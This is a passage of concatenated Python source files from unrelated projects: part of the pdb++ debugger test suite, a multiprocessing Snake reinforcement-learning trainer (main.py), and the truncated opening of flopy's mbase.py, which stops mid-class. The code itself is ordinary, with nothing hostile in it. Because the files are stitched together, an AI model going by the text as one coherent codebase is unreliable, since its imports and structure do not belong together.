hidden .* # debug inner() ENTERING RECURSIVE DEBUGGER [NUM] > .* (#) c --KeyboardInterrupt-- # c """) @pytest.mark.skipif(hasattr(pdb.pdb.Pdb, "_cmdloop"), reason="_cmdloop is available") def test_sigint_in_interaction_without_new_cmdloop(): def fn(): def inner(): raise KeyboardInterrupt() set_trace() with pytest.raises(KeyboardInterrupt): check(fn, """ --Return-- [NUM] > .*fn() -> set_trace() 5 frames hidden .* # debug inner() ENTERING RECURSIVE DEBUGGER [NUM] > .* (#) c """) # Reset pdb, which did not clean up correctly. # Needed for PyPy (Python 2.7.13[pypy-7.1.0-final]) with coverage and # restoring trace function. pdb.local.GLOBAL_PDB.reset() def test_debug_rebind_globals(monkeypatch): class PdbWithCustomDebug(pdb.pdb.Pdb): def do_debug(self, arg): if "PdbTest" not in globals(): # Do not use assert here, since it might fail with "NameError: # name '@pytest_ar' is not defined" via pytest's assertion # rewriting then. import pytest pytest.fail("PdbTest is not in globals.") print("called_do_debug", Pdb, self) # noqa: F821 monkeypatch.setattr(pdb.pdb, "Pdb", PdbWithCustomDebug) class CustomPdbTest(PdbTest, PdbWithCustomDebug): pass def fn(): def inner(): pass set_trace(Pdb=CustomPdbTest) check(fn, """ --Return-- [NUM] > .*fn() -> set_trace(.*) 5 frames hidden .* # debug inner() called_do_debug.* # c """) @pytest.mark.skipif(not hasattr(pdb.pdb.Pdb, "_previous_sigint_handler"), reason="_previous_sigint_handler is not available") def test_interaction_restores_previous_sigint_handler(): """Test is based on cpython's test_pdb_issue_20766.""" def fn(): i = 1 while i <= 2: sess = PdbTest(nosigint=False) sess.set_trace(sys._getframe()) print('pdb %d: %s' % (i, sess._previous_sigint_handler)) i += 1 check(fn, """ [NUM] > .*fn() -> print('pdb %d: %s' % (i, sess._previous_sigint_handler)) 5 frames hidden .* # c pdb 1: <built-in function default_int_handler> [NUM] > .*fn() -> .* 5 frames hidden .* # c pdb 2: <built-in function default_int_handler> """) def test_recursive_set_trace(): def fn(): global inner global count count = 0 def inner(): global count count += 1 if count == 1: set_trace() else: set_trace(cleanup=False) inner() check(fn, """ --Return-- [NUM] > .*inner() -> set_trace() 5 frames hidden .* # inner() # c """) def test_steps_over_set_trace(): def fn(): set_trace() print(1) set_trace(cleanup=False) print(2) check(fn, """ [NUM] > .*fn() -> print(1) 5 frames hidden .* # n 1 [NUM] > .*fn() -> set_trace(cleanup=False) 5 frames hidden .* # n [NUM] > .*fn() -> print(2) 5 frames hidden .* # c 2 """) def test_break_after_set_trace(): def fn(): set_trace() print(1) print(2) _, lineno = inspect.getsourcelines(fn) check(fn, """ [NUM] > .*fn() -> print(1) 5 frames hidden .* # break {lineno} Breakpoint . at .*:{lineno} # c 1 [NUM] > .*fn() -> print(2) 5 frames hidden .* # import pdb; pdb.local.GLOBAL_PDB.clear_all_breaks() # c 2 """.format(lineno=lineno + 3)) def test_break_with_inner_set_trace(): def fn(): def inner(): set_trace(cleanup=False) set_trace() inner() print(1) _, lineno = inspect.getsourcelines(fn) check(fn, """ [NUM] > .*fn() -> inner() 5 frames hidden .* # break {lineno} Breakpoint . at .*:{lineno} # c --Return-- [NUM] > .*inner()->None -> set_trace(cleanup=False) 5 frames hidden .* # import pdb; pdb.local.GLOBAL_PDB.clear_all_breaks() # c 1 """.format(lineno=lineno + 8)) @pytest.mark.skipif( sys.version_info < (3,), reason="no support for exit from interaction with pdbrc" ) def test_pdbrc_continue(tmpdir): """Test that interaction is skipped with continue in pdbrc.""" with tmpdir.as_cwd(): with open(".pdbrc", "w") as f: f.writelines([ "p 'from_pdbrc'\n", "continue\n", ]) def fn(): set_trace(readrc=True) print("after_set_trace") check(fn, """ 'from_pdbrc' after_set_trace """) def test_python_m_pdb_usage(): import subprocess p = subprocess.Popen( [sys.executable, "-m", "pdb"], stdout=subprocess.PIPE, stderr=subprocess.PIPE ) stdout, stderr = p.communicate() out = stdout.decode("utf8") err = stderr.decode("utf8") assert err == "" assert "usage: pdb.py" in out @pytest.mark.skip def test_python_m_pdb_uses_pdbpp(tmphome): import subprocess f = tmphome.ensure("test.py") f.write("import os\n__import__('pdb').set_trace()") p = subprocess.Popen( [sys.executable, "-m", "pdb", str(f)], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE ) stdout, stderr = p.communicate(b"c\n") out = stdout.decode("utf8") err = stderr.decode("utf8") print(out) print(err, file=sys.stderr) assert err == "" assert "(Pdb)" not in out assert "(Pdb++)" in out assert out.endswith("\n(Pdb++) \n") def get_completions(text): """Get completions from the installed completer.""" readline_ = pdb.local.GLOBAL_PDB.fancycompleter.config.readline complete = readline_.get_completer() comps = [] assert complete.__self__ is pdb.local.GLOBAL_PDB while True: val = complete(text, len(comps)) if val is None: break comps += [val] return comps def test_set_trace_in_completion(monkeypatch_readline): def fn(): class CompleteMe(object): attr_called = 0 @property def set_trace_in_attrib(self): self.attr_called += 1 set_trace(cleanup=False) print("inner_set_trace_was_ignored") obj = CompleteMe() def check_completions(): monkeypatch_readline("obj.", 0, 4) comps = get_completions("obj.") assert obj.attr_called == 1, "attr was called" # Colorization only works with pyrepl, via pyrepl.readline._setup. assert any("set_trace_in_attrib" in comp for comp in comps), comps return True set_trace() check(fn, """ --Return-- [NUM] > .*fn() .* 5 frames hidden .* # check_completions() inner_set_trace_was_ignored True # c """) def test_completes_from_pdb(monkeypatch_readline): """Test that pdb's original completion is used.""" def fn(): where = 1 # noqa: F841 set_trace() def check_completions(): # Patch readline to return expected results for "wher". monkeypatch_readline("wher", 0, 4) assert get_completions("wher") == ["where"] if sys.version_info > (3, ): # Patch readline to return expected results for "disable ". monkeypatch_readline("disable", 8, 8) # NOTE: number depends on bpb.Breakpoint class state, just ensure that # is a number. completion = pdb.local.GLOBAL_PDB.complete("", 0) assert int(completion) > 0 # Patch readline to return expected results for "p ". monkeypatch_readline("p ", 2, 2) comps = get_completions("") assert "where" in comps # Dunder members get completed only on second invocation. assert "__name__" not in comps comps = get_completions("") assert "__name__" in comps # Patch readline to return expected results for "help ". monkeypatch_readline("help ", 5, 5) comps = get_completions("") assert "help" in comps return True set_trace() _, lineno = inspect.getsourcelines(fn) check(fn, """ [NUM] > .*fn() .* 5 frames hidden .* # break %d Breakpoint NUM at .* # c --Return-- [NUM] > .*fn() .* 5 frames hidden .* # check_completions() True # c """ % lineno) def test_completion_uses_tab_from_fancycompleter(monkeypatch_readline): """Test that pdb's original completion is used.""" def fn(): def check_completions(): # Patch readline to return expected results for "C.f()". monkeypatch_readline("C.f()", 5, 5) assert get_completions("") == ["\t"] return True set_trace() _, lineno = inspect.getsourcelines(fn) check(fn, """ --Return-- [NUM] > .*fn()->None .* 5 frames hidden .* # check_completions() True # c """) def test_complete_removes_duplicates_with_coloring( monkeypatch_readline, readline_param ): def fn(): helpvar = 42 # noqa: F841 def check_completions(): # Patch readline to return expected results for "help". monkeypatch_readline("help", 0, 4) if readline_param == "pyrepl": assert pdb.local.GLOBAL_PDB.fancycompleter.config.use_colors is True assert get_completions("help") == [ "\x1b[000;00m\x1b[00mhelp\x1b[00m", "\x1b[001;00m\x1b[33;01mhelpvar\x1b[00m", " ", ] else: assert pdb.local.GLOBAL_PDB.fancycompleter.config.use_colors is False assert get_completions("help") == ["help", "helpvar"] return True set_trace() _, lineno = inspect.getsourcelines(fn) check(fn, """ --Return-- [NUM] > .*fn()->None .* 5 frames hidden .* # check_completions() True # c """) @pytest.mark.skipif(sys.version_info < (3, ), reason="py2: no completion for break") def test_completion_removes_tab_from_fancycompleter(monkeypatch_readline): def fn(): def check_completions(): # Patch readline to return expected results for "b ". monkeypatch_readline("b ", 2, 2) comps = get_completions("") assert "\t" not in comps assert "inspect" in comps return True set_trace() _, lineno = inspect.getsourcelines(fn) check(fn, """ --Return-- [NUM] > .*fn() .* 5 frames hidden .* # check_completions() True # c """) def test_integration(testdir, tmphome): """Integration test.""" import sys f = tmphome.ensure("test_file.py") f.write("print('before'); __import__('pdb').set_trace(); print('after')") import os assert os.getcwd() == tmphome child = testdir.spawn(sys.executable + " " + str(f), expect_timeout=1) # NOTE: b'\x1b[?12l\x1b[?25h' comes via pyrepl. pdbpp_prompt = "\n(Pdb++) \x1b[?12l\x1b[?25h" child.expect_exact(pdbpp_prompt) # Completes help as unique (coming from pdb and fancycompleter). child.send(b"hel\t") child.expect_exact(b"\x1b[1@h\x1b[1@e\x1b[1@l\x1b[1@p") child.sendline("") child.expect_exact("\r\nDocumented commands") child.expect_exact(pdbpp_prompt) # Completes breakpoints via pdb, should not contain "\t" from # fancycompleter. if sys.version_info >= (3, 3): child.send(b"b \t") child.expect_exact(b'\x1b[1@b\x1b[1@ \x1b[?25ltest_file.py:\x1b[?12l\x1b[?25h') child.sendline("") child.expect_exact( b"\x1b[23D\r\n\r\x1b[?1l\x1b>*** Bad lineno: \r\n" b"\x1b[?1h\x1b=\x1b[?25l\x1b[1A\r\n(Pdb++) \x1b[?12l\x1b[?25h" ) child.sendline("c") rest = child.read() assert rest == b'\x1b[1@c\x1b[9D\r\n\r\x1b[?1l\x1b>' def test_complete_with_bang(monkeypatch_readline): """Test that completion works after "!". This requires parseline to return "" for the command (bpo-35270). """ def fn(): a_var = 1 # noqa: F841 def check_completions(): # Patch readline to return expected results for "!a_va". monkeypatch_readline("!a_va", 0, 5) assert pdb.local.GLOBAL_PDB.complete("a_va", 0) == "a_var" # Patch readline to return expected results for "list(a_va". monkeypatch_readline("list(a_va", 5, 9) assert pdb.local.GLOBAL_PDB.complete("a_va", 0) == "a_var" return True set_trace() check(fn, """ --Return-- [NUM] > .*fn() .* 5 frames hidden .* # check_completions() True # c """) def test_completer_after_debug(monkeypatch_readline): def fn(): myvar = 1 # noqa: F841 def inner(): myinnervar = 1 # noqa: F841 def check_completions_inner(): # Patch readline to return expected results for "myin". monkeypatch_readline("myin", 0, 4) assert "myinnervar" in get_completions("myin") return True print("inner_end") def check_completions(): # Patch readline to return expected results for "myva". monkeypatch_readline("myva", 0, 4) assert "myvar" in get_completions("myva") return True set_trace() print("ok_end") check(fn, """ [NUM] > .*fn() .* 5 frames hidden .* # pdb.local.GLOBAL_PDB.curframe.f_code.co_name 'fn' # debug inner() ENTERING RECURSIVE DEBUGGER [1] > <string>(1)<module>() (#) pdb.local.GLOBAL_PDB.curframe.f_code.co_name '<module>' (#) s --Call-- [NUM] > .*inner() -> def inner(): (#) pdb.local.GLOBAL_PDB.curframe.f_code.co_name 'inner' (#) r inner_end --Return-- [NUM] > .*inner()->None -> print("inner_end") (#) check_completions_inner() True (#) q LEAVING RECURSIVE DEBUGGER # check_completions() True # c ok_end """) def test_ensure_file_can_write_unicode(): import io from pdb import DefaultConfig, Pdb out = io.BytesIO(b"") stdout = io.TextIOWrapper(out, encoding="latin1") p = Pdb(Config=DefaultConfig, stdout=stdout) assert p.stdout.stream is out p.stdout.write(u"test äöüß") out.seek(0) assert out.read().decode("utf-8") == u"test äöüß" @pytest.mark.skipif(sys.version_info >= (3, 0), reason="test is python2 specific") def test_py2_ensure_file_can_write_unicode(): import StringIO from pdb import DefaultConfig, Pdb stdout = StringIO.StringIO() stdout.encoding = 'ascii' p = Pdb(Config=DefaultConfig, stdout=stdout) assert p.stdout.stream is stdout p.stdout.write(u"test äöüß") stdout.seek(0) assert stdout.read().decode('utf-8') == u"test äöüß" def test_signal_in_nonmain_thread_with_interaction(): def fn(): import threading evt = threading.Event() def start_thread(): evt.wait() set_trace(nosigint=False) t = threading.Thread(target=start_thread) t.start() set_trace(nosigint=False) evt.set() t.join() check(fn, """ [NUM] > .*fn() -> evt.set() 5 frames hidden .* # c --Return-- [NUM] > .*start_thread()->None -> set_trace(nosigint=False) # c """) def test_signal_in_nonmain_thread_with_continue(): """Test for cpython issue 13120 (test_issue13120). Without the try/execept for ValueError in its do_continue it would display the exception, but work otherwise. """ def fn(): import threading def start_thread(): a = 42 # noqa F841 set_trace(nosigint=False) t = threading.Thread(target=start_thread) t.start() # set_trace(nosigint=False) t.join() check(fn, """ --Return-- [NUM] > .*start_thread()->None -> set_trace(nosigint=False) # p a 42 # c """) def test_next_at_end_of_stack_after_unhide(): """Test that compute_stack returns correct length with show_hidden_frames.""" class MyConfig(ConfigTest): def before_interaction_hook(self, pdb): pdb.stdout.write('before_interaction_hook\n') pdb.do_hf_unhide(arg=None) def fn(): set_trace(Config=MyConfig) return 1 check(fn, """ [NUM] > .*fn() -> return 1 5 frames hidden .* before_interaction_hook # n --Return-- [NUM] > .*fn()->1 -> return 1 5 frames hidden .* before_interaction_hook # c """) def test_rawinput_with_debug(): """Test backport of fix for bpo-31078.""" def fn(): set_trace() check(fn, """ --Return-- [NUM] > .*fn() -> set_trace() 5 frames hidden .* # debug 1 ENTERING RECURSIVE DEBUGGER [NUM] > <string>(1)<module>()->None (#) import pdb; print(pdb.local.GLOBAL_PDB.use_rawinput) 1 (#) p sys._getframe().f_back.f_locals['self'].use_rawinput 1 (#) c LEAVING RECURSIVE DEBUGGER # c """) @pytest.mark.skipif(not hasattr(pdb.pdb.Pdb, "error"), reason="no error method") def test_error_with_traceback(): def fn(): def error(): raise ValueError("error") set_trace() check(fn, """ --Return-- [NUM] > .*fn() -> set_trace() 5 frames hidden .* # error() \\*\\*\\* ValueError: error Traceback (most recent call last): File .*, in error raise ValueError("error") # c """) @pytest.mark.skipif(not hasattr(pdb.pdb.Pdb, "error"), reason="no error method") def test_chained_syntaxerror_with_traceback(): def fn(): def compile_error(): compile("invalid(", "<stdin>", "single") def error(): try: compile_error() except Exception: raise AttributeError set_trace() check(fn, """ --Return-- [NUM] > .*fn() -> set_trace() 5 frames hidden .* # error() \\*\\*\\* AttributeError.* Traceback (most recent call last): File .*, in error compile_error() File .*, in compile_error compile.* File "<stdin>", line 1 invalid( .*^ SyntaxError: .* During handling of the above exception, another exception occurred: Traceback (most recent call last): File .*, in error raise AttributeError # c """) @pytest.mark.skipif(not hasattr(pdb.pdb.Pdb, "error"), reason="no error method") def test_error_with_traceback_disabled(): class ConfigWithoutTraceback(ConfigTest): show_traceback_on_error = False def fn(): def error(): raise ValueError("error") set_trace(Config=ConfigWithoutTraceback) check(fn, """ --Return-- [NUM] > .*fn() -> set_trace(Config=ConfigWithoutTraceback) 5 frames hidden .* # error() \\*\\*\\* ValueError: error # c """) @pytest.mark.skipif(not hasattr(pdb.pdb.Pdb, "error"), reason="no error method") def test_error_with_traceback_limit(): class ConfigWithLimit(ConfigTest): show_traceback_on_error_limit = 2 def fn(): def f(i): i -= 1 if i <= 0: raise ValueError("the_end") f(i) def error(): f(10) set_trace(Config=ConfigWithLimit) check(fn, """ --Return-- [NUM] > .*fn() -> set_trace(Config=ConfigWithLimit) 5 frames hidden .* # error() \\*\\*\\* ValueError: the_end Traceback (most recent call last): File .*, in error f(10) File .*, in f f(i) # c """) def test_next_with_exception_in_call(): """Ensure that "next" works correctly with exception (in try/except). Previously it would display the frame where the exception occurred, and then "next" would continue, instead of stopping at the next statement. """ def fn(): def keyerror(): raise KeyError set_trace() try: keyerror() except KeyError: print("got_keyerror") check(fn, """ [NUM] > .*fn() -> try: 5 frames hidden .* # n [NUM] > .*fn() -> keyerror() 5 frames hidden .* # n KeyError [NUM] > .*fn() -> keyerror() 5 frames hidden .* # n [NUM] > .*fn() -> except KeyError: 5 frames hidden .* # c got_keyerror """) def test_locals(): def fn(): def f(): set_trace() print("foo=%s" % foo) # noqa: F821 foo = 2 # noqa: F841 f() check(fn, """ [NUM] > .*f() -> print("foo=%s" % foo) 5 frames hidden .* # foo = 42 # foo 42 # pp foo 42 # p foo 42 # c foo=42 """) def test_get_editor_cmd(monkeypatch): _pdb = PdbTest() _pdb.config.editor = None monkeypatch.setenv("EDITOR", "nvim") assert _pdb._get_editor_cmd("fname", 42) == "nvim +42 fname" monkeypatch.setenv("EDITOR", "") with pytest.raises(RuntimeError, match=( r"Could not detect editor. Configure it or set \$EDITOR." )): _pdb._get_editor_cmd("fname", 42) monkeypatch.delenv("EDITOR") try: which = "shutil.which" monkeypatch.setattr(which, lambda x: None) except AttributeError: which = "distutils.spawn.find_executable" monkeypatch.setattr(which, lambda x: None) with pytest.raises(RuntimeError, match=( r"Could not detect editor. Configure it or set \$EDITOR." )): _pdb._get_editor_cmd("fname", 42) monkeypatch.setattr(which, lambda x: "vim") assert _pdb._get_editor_cmd("fname", 42) == "vim +42 fname" monkeypatch.setattr(which, lambda x: "vi") assert _pdb._get_editor_cmd("fname", 42) == "vi +42 fname" _format = _pdb._format_editcmd assert _format("subl {filename}:{lineno}", "with space", 12) == ( "subl 'with space':12") assert _format("edit", "with space", 12) == ( "edit +12 'with space'") assert _format("edit +%%%d %%%s%% %d", "with space", 12) == ( "edit +%12 %'with space'% 12") def test_edit_error(monkeypatch): class MyConfig(ConfigTest): editor = None monkeypatch.setenv("EDITOR", "") def fn(): set_trace(Config=MyConfig) check(fn, r""" --Return-- [NUM] > .*fn() -> set_trace(Config=MyConfig) 5 frames hidden .* # edit \*\*\* Could not detect editor. Configure it or set \$EDITOR. # c """) def test_global_pdb_per_thread_with_input_lock(): def fn(): import threading evt1 = threading.Event() evt2 = threading.Event() def __t1__(evt1, evt2): set_trace(cleanup=False) def __t2__(evt2): evt2.set() set_trace(cleanup=False) t1 = threading.Thread(name="__t1__", target=__t1__, args=(evt1, evt2)) t1.start() assert evt1.wait(1.0) is True t2 = threading.Thread(name="__t2__", target=__t2__, args=(evt2,)) t2.start() t1.join() t2.join() check(fn, r""" --Return-- [NUM] > .*__t1__() -> set_trace(cleanup=False) # evt1.set() # import threading; threading.current_thread().name '__t1__' # assert evt2.wait(1.0) is True; import time; time.sleep(0.1) --Return-- [NUM] > .*__t2__()->None -> set_trace(cleanup=False) # import threading; threading.current_thread().name '__t2__' # c # import threading; threading.current_thread().name '__t1__' # c """) def test_usage_error_with_commands(): def fn(): set_trace() check(fn, r""" --Return-- [NUM] > .*fn()->None -> set_trace() 5 frames hidden .* # commands invalid .*Usage.*: commands [bnum] ... end # c """) @pytest.mark.skipif(sys.version_info < (3,), reason="py2 has no support for kwonly") def test_rebind_globals_kwonly(): exec("def func(*args, header=None): pass", globals()) func = globals()["func"] sig = str(inspect.signature(func)) assert sig == "(*args, header=None)" new = pdb.rebind_globals(func, globals()) assert str(inspect.signature(new)) == sig @pytest.mark.skipif(sys.version_info < (3,), reason="py2 has no support for annotations") def test_rebind_globals_annotations(): exec("def func(ann: str = None): pass", globals()) func = globals()["func"] sig = str(inspect.signature(func)) if sys.version_info < (3, 5): assert sig == "(ann:str=None)" else: assert sig in ( "(ann: str = None)", "(ann:str=None)", ) new = pdb.rebind_globals(func, globals()) assert str(inspect.signature(new)) == sig def test_debug_with_set_trace(): def fn(): def inner(): def inner_inner(): pass set_trace(cleanup=False) set_trace() check(fn, """ --Return-- [NUM] > .*fn() .* 5 frames hidden .* # debug inner() ENTERING RECURSIVE DEBUGGER [NUM] > <string>(1)<module>()->None (#) r --Return-- [NUM] > .*inner()->None -> set_trace(cleanup=False) 5 frames hidden .* (#) pdb.local.GLOBAL_PDB.curframe.f_code.co_name 'inner' (#) debug inner_inner() ENTERING RECURSIVE DEBUGGER [NUM] > <string>(1)<module>()->None ((#)) c LEAVING RECURSIVE DEBUGGER (#) c LEAVING RECURSIVE DEBUGGER # c """) def test_set_trace_with_incomplete_pdb(): def fn(): existing_pdb = PdbTest() assert not hasattr(existing_pdb, "botframe") set_trace(cleanup=False) assert hasattr(existing_pdb, "botframe") assert pdb.local.GLOBAL_PDB is existing_pdb check(fn, """ [NUM] > .*fn() .* 5 frames hidden .* # c """) def test_config_gets_start_filename(): def fn(): setup_lineno = set_trace.__code__.co_firstlineno + 8 set_trace_lineno = sys._getframe().f_lineno + 8 class MyConfig(ConfigTest): def setup(self, pdb): print("config_setup") assert pdb.start_filename == __file__ assert pdb.start_lineno == setup_lineno set_trace(Config=MyConfig) assert pdb.local.GLOBAL_PDB.start_lineno == set_trace_lineno check(fn, r""" config_setup [NUM] > .*fn() -> assert pdb.local.GLOBAL_PDB.start_lineno == set_trace_lineno 5 frames hidden .* # c """) def test_do_bt(): def fn(): set_trace() expected_bt = [] for i, entry in enumerate(traceback.extract_stack()[:-3]): expected_bt.append(" [%2d] .*" % i) expected_bt.append(" .*") check(fn, r""" --Return-- [NUM] > .*fn()->None -> set_trace() 5 frames hidden .* # bt {expected} [NUM] .*(NUM)runpdb() func() > [NUM] .*(NUM)fn()->None set_trace() # c """.format(expected="\n".join(expected_bt))) def test_do_bt_highlight(): def fn(): set_trace(Config=ConfigWithHighlight) expected_bt = [] for i, entry in enumerate(traceback.extract_stack()[:-3]): expected_bt.append(" [%2d] .*" % i) expected_bt.append(" .*") check(fn, r""" --Return-- [NUM] > .*fn()->None -> set_trace(Config=ConfigWithHighlight) 5 frames hidden .* # bt {expected} [NUM] ^[[33;01m.*\.py^[[00m(^[[36;01mNUM^[[00m)runpdb() func() > [NUM] ^[[33;01m.*\.py^[[00m(^[[36;01mNUM^[[00m)fn()->None set_trace(Config=ConfigWithHighlight) # c """.format(expected="\n".join(expected_bt))) def test_do_bt_pygments(): def fn(): set_trace(Config=ConfigWithPygments) expected_bt = [] for i, entry in enumerate(traceback.extract_stack()[:-3]): expected_bt.append(" [%2d] .*" % i) expected_bt.append(" .*") check(fn, r""" --Return-- [NUM] > .*fn()->None -> set_trace(Config^[[38;5;241m=^[[39mConfigWithPygments) 5 frames hidden .* # bt {expected} [NUM] .*(NUM)runpdb() func() > [NUM] .*\.py(NUM)fn()->None set_trace(Config^[[38;5;241m=^[[39mConfigWithPygments) # c """.format(expected="\n".join(expected_bt))) def test_debug_with_pygments(): def fn(): set_trace(Config=ConfigWithPygments) check(fn, r""" --Return-- [NUM] > .*fn()->None -> set_trace(Config^[[38;5;241m=^[[39mConfigWithPygments) 5 frames hidden .* # debug 1 ENTERING RECURSIVE DEBUGGER [1] > <string>(1)<module>()->None (#) c LEAVING RECURSIVE DEBUGGER # c """) def test_debug_with_pygments_and_highlight(): def fn(): set_trace(Config=ConfigWithPygmentsAndHighlight) check(fn, r""" --Return-- [NUM] > .*fn()->None -> set_trace(Config^[[38;5;241m=^[[39mConfigWithPygmentsAndHighlight) 5 frames hidden .* # debug 1 ENTERING RECURSIVE DEBUGGER [1] > ^[[33;01m<string>^[[00m(^[[36;01m1^[[00m)<module>()->None (#) c LEAVING RECURSIVE DEBUGGER # c """) def test_set_trace_in_default_code(): """set_trace while not tracing and should not (re)set the global pdb.""" def fn(): def f(): before = pdb.local.GLOBAL_PDB set_trace(cleanup=False) assert before is pdb.local.GLOBAL_PDB set_trace() check(fn, r""" --Return-- [NUM] > .*fn()->None -> set_trace() 5 frames hidden .* # f() # import pdb; pdb.local.GLOBAL_PDB.curframe is not None True # l {line_num}, 2 NUM \t def fn(): NUM \t def f(): NUM \t before = pdb.local.GLOBAL_PDB # c """.format( line_num=fn.__code__.co_firstlineno, )) def test_error_with_pp(): def fn(): class BadRepr: def __repr__(self): raise Exception('repr_exc') obj = BadRepr() # noqa: F841 set_trace() check(fn, r""" --Return-- [NUM] > .*fn()->None -> set_trace() 5 frames hidden .* # p obj \*\*\* Exception: repr_exc # pp obj \*\*\* Exception: repr_exc # c """) def test_do_source(): def fn(): set_trace() check(fn, r""" --Return-- [NUM] > .*fn()->None -> set_trace() 5 frames hidden .* # source ConfigWithPygmentsAndHighlight \d\d class ConfigWithPygmentsAndHighlight(ConfigWithPygments, ConfigWithHigh$ \d\d pass # c """) def test_do_source_with_pygments(): def fn(): set_trace(Config=ConfigWithPygments) check(fn, r""" --Return-- [NUM] > .*fn()->None -> set_trace(Config^[[38;5;241m=^[[39mConfigWithPygments) 5 frames hidden .* # source ConfigWithPygmentsAndHighlight \d\d ^[[38;5;28;01mclass^[[39;00m ^[[38;5;21;01mConfigWithPygmentsAndHighlight^[[39;00m(ConfigWithPygments, ConfigWithHigh$ \d\d ^[[38;5;28;01mpass^[[39;00m # c """) # noqa: E501 def test_do_source_with_highlight(): def fn(): set_trace(Config=ConfigWithHighlight) check(fn, r""" --Return-- [NUM] > .*fn()->None -> set_trace(Config=ConfigWithHighlight) 5 frames hidden .* # source ConfigWithPygmentsAndHighlight ^[[36;01m\d\d^[[00m class ConfigWithPygmentsAndHighlight(ConfigWithPygments, ConfigWithHigh$ ^[[36;01m\d\d^[[00m pass # c """) # noqa: E501 def test_do_source_with_pygments_and_highlight(): def fn(): set_trace(Config=ConfigWithPygmentsAndHighlight) check(fn, r""" --Return-- [NUM] > .*fn()->None -> set_trace(Config^[[38;5;241m=^[[39mConfigWithPygmentsAndHighlight) 5 frames hidden .* # source ConfigWithPygmentsAndHighlight ^[[36;01m\d\d^[[00m ^[[38;5;28;01mclass^[[39;00m ^[[38;5;21;01mConfigWithPygmentsAndHighlight^[[39;00m(ConfigWithPygments, ConfigWithHigh$ ^[[36;01m\d\d^[[00m ^[[38;5;28;01mpass^[[39;00m # c """) # noqa: E501 def test_do_source_without_truncating(): def fn(): class Config(ConfigTest): truncate_long_lines = False set_trace(Config=Config) check(fn, r""" --Return-- [NUM] > .*fn()->None -> set_trace(Config=Config) 5 frames hidden .* # source ConfigWithPygmentsAndHighlight \d\d class ConfigWithPygmentsAndHighlight(ConfigWithPygments, ConfigWithHighlight):$ \d\d pass # c """)
main.py
from game import Snake from agent import Agent from settings import * from enum import Enum import multiprocessing as mp from multiprocessing import Pool, Process import os import json import random class Windows(Enum): """ Windows enums W_i = (m, n, s, k) where m is number of row tiles n is number of column tiles s is number of row processors k is number of column processors """ #W1 = (20, 20, 1, 3) # W2 = (20, 20, 3, 1) # W5 = (20, 20, 3, 1) #W4 = (20, 20, 1, 1) # W6 = (20, 20, 3, 1) # W7 = (20, 20, 3, 1) # W8 = (20, 20, 3, 1) # W9 = (20, 20, 3, 1) # W10 = (20, 20, 3, 1) # W11 = (20, 20, 3, 1) # W12 = (20, 20, 3, 1) # W13 = (20, 20, 3, 1) W14 = (20, 20, 1, 1) class Game: """ Run the Game Read the json file par_lev.json run all the processors with .json parameters """ def __init__(self, lv=1): """ (Game, int) -> None initialize the game and what world you want the game to run in lv: level selected in pygame by default it is set to world 1 """ self.lv = lv self.awake() def awake(self): """ (Game) -> None read json file get the worlds with their parameters iterate through all the world until we found the world we initialized create the enviroments run processors parallel with each other using multiprocessing """ processes = [] file = open('par_lev.json', 'r') json_pars = json.load(file) file.close() # get all enum Windows for window in Windows: # get specific window from json file pars = json_pars.get(window.name, [{}]) # check if window exist if window.name == "W" + str(self.lv): # take the window and unpack values n, m, k, l = window.value # set screen size with nxm tiles n, m = (set_size(n), set_size(m)) index = 0 # change position of the screen of each processor window # accordingly # NOTE: the margin might not be what u excpect for i in range(k): for j in range(l): os.environ['SDL_VIDEO_WINDOW_POS'] = "%d,%d" % (100+(n+m)*i,100+(n+m)*j) # create the processors and add in the pool if index < len(pars) and len(pars) > 0: p = Process(target=self.train, args=(n, m, pars[index])) elif len(pars) >= index: p = Process(target=self.train, args=(n, m, {})) else: p = Process(target=self.train, args=(n, m, pars[0])) # start proceesors p.start() processes.append(p) index += 1 break for p in processes: # join every processors p.join() # save run stats to a txt file at a specified path # txt files are used by build_graphs.py to build graphs def save_to_file(self, path, game_num, score, record): """ (Game, str, int, int, int) -> None save the file as .txt file save game, score, record as following format g s r respectively path: path of the txt file game_num: total number of generations score: current score taken from the game record: highest score """ file = open(path, "a+") file.write("%s %s %s\n" % (game_num, score, record)) file.close() def train(self, n, m, pars): """ (Game, int, int, dict()) -> None train game and run each step as sequence of frames n: row tiles of the screen m: col tiles of the screen pars" parameters passed in for each processors """ # initialize record = 0 game = Snake(n, m, pars.get('n_food', None)) agent = Agent(game, pars) while True: # get old state state_old = game.get_state() # get move final_move = agent.get_action(state_old) # perform move and get new state reward, done, score = game.play_step(final_move, pars) state_new = game.get_state() # train short memory agent.train_short_memory(state_old, final_move, reward, state_new, done) # remember agent.remember(state_old, final_move, reward, state_new, done) # end game if reached num_games from pars or DEFAULT_END_GAME_POINT # if set to -1 then run for ever if pars.get('num_games', DEFAULT_END_GAME_POINT) != -1: if agent.n_games > pars.get('num_games', DEFAULT_END_GAME_POINT): quit() break # when game is over if done: # reset game attributes # increase game generation # train the long memory game.reset() agent.n_games += 1 agent.train_long_memory() # new highscore if score > record: record = score # save the best model_state #agent.model.save() # takes away food depending on given probability, up until 1 food remains decrease_probability = pars.get('decrease_food_chance', DECREASE_FOOD_CHANCE) if (game.n_food > 1) and (random.random() < decrease_probability): game.n_food -= 1 # prints game information to console print('Game', agent.n_games, 'Score', score, 'Record:', record) # appends game information to txt filen at specified path self.save_to_file(f"graphs/{pars.get('graph', 'test')}.txt", agent.n_games, score, record) if __name__ == "__main__": # for i in range(2, 3): # Game(i) Game(14)
mbase.py
""" mbase module This module contains the base model class from which all of the other models inherit from. """ from __future__ import print_function import abc import sys import os import subprocess as sp import shutil import threading import warnings if sys.version_info > (3, 0): import queue as Queue else: import Queue from datetime import datetime import copy import numpy as np from flopy import utils, discretization from .version import __version__ from .discretization.modeltime import ModelTime from .discretization.grid import Grid if sys.version_info >= (3, 3): from shutil import which else: from distutils.spawn import find_executable as which # Global variables iconst = 1 # Multiplier for individual array elements in integer and real arrays read by MODFLOW's U2DREL, U1DREL and U2DINT. iprn = -1 # Printout flag. If >= 0 then array values read are printed in listing file. class FileDataEntry(object): def __init__(self, fname, unit, binflag=False, output=False, package=None): self.fname = fname self.unit = unit self.binflag = binflag self.output = output self.package = package class FileData(object): def __init__(self): self.file_data = [] return def add_file(self, fname, unit, binflag=False, output=False, package=None): ipop = [] for idx, file_data in enumerate(self.file_data): if file_data.fname == fname or file_data.unit == unit: ipop.append(idx) self.file_data.append(FileDataEntry(fname, unit, binflag=binflag, output=output, package=package)) return class 